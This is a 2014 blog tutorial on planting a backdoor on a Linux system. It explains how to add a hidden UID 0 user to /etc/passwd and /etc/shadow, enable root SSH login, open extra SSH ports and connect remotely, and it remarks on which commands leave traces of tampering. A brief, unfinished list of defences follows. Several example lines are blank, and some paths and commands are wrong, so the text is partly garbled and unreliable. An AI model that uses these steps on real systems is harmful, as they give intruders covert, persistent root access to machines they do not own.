Saturday, 13 December 2014

Hack: Simplest of Backdoors.

Computer System A (Alice).

Backdoor is software that allows access to computer system, a call to certain function.

Backdoors are left by programmers & hackers to *easily & quickly* gain access to hacked or normally accessed machine at later time.

It's useful skill for any net admin, to be able to leave a backdoor on a computer system - to protect hardware-software infrastructure against data leaks or machine control attempts of this type - especially if combined with programming or scripting.

In this tutorial we'll explain how to leave a backdoor on Linux system & how to protect from that type of attacks.

How to do leave a backdoor on a Linux system?

1. Modify /etc/passwd & /etc/shadow files properly, to add user with intelligently chosen name.

to /etc/passwd file we add line:


- username is name of the user added
- path is user's home path - for example /root for root user
- shell is shell used - for example /bin/bash
- 0 is user identifier (use 0 for root user)
- 0 is group identifier (use 0 for root group)

for example:

to /etc/shadow we add line:

- username is name of the user added

for example:

then we call passwd username command to finalize process.

for example:
passwd bond

2. Configure & start sshd service which allows for remote access to computer using secure (encrypted) connection.

we edit file: /etc/ssh/sshd_config
we modify line with PermitRootLogin command if neccessary, to allow for root login.
for example, we can comment it with # character.

# PermitRootLogin no

we start sshd service.

depending on Linux distribution, this command can vary, for example:
/etc/init.d/sshd start
/etc/init.d/service ssh start

we might need to locate sshd file with 'locate sshd' command.

3. Connect remotely to computer system with backdoor.

ssh username@ipaddr
ssh username@ipaddr -p port

- username is name of the user added in the backdoor creation process
- ipaddr is the ip address of computer system with backdoor
- port is the port number of computer system with backdoor (22 by default)

for example:
ssh bond@
ssh bond@ -p 2016

additional ssh port(s) are enabled in /etc/config/sshd_config file by adding line(s):
Port portnumber

- portnumber is number of port to listen on.

for example:

/etc/config/sshd_config : ssh configuration file,
ssh listen ports configuration is there.

then we need to start or restart ssh service.

for example:
/etc/init.d/sshd start
service ssh start
/etc/init.d/sshd restart
service ssh restart

4. Checking if ssh service is running, and on which ports it listens:

'sockstat pipe grep' command.

sockstat tool, if not available, can be obtained from software repository with:

apt-get install sockstat

(this changes operating system configuration, leaving a trace of tampering - as most of commands do, but this one is serious trace of tampering).

or we can use commands:
- service ssh status
- service sshd status

if nothing of above works, keep hacking, perhaps there are commands that work...

How to protect computer system against this type of backdoors?

for now have following ideas:

- manual checking of files regularly (/etc/passwd , /etc/shadow),
- using grep script to automate above mentioned check,
- using 'hidden' kernel functionality - which is beyond scope of this tutorial...).

(to be elaborated if neccessary, but i need a little of time to think, to do it properly enough).

that's all.

Computer System B (Bob).

No comments:

Post a Comment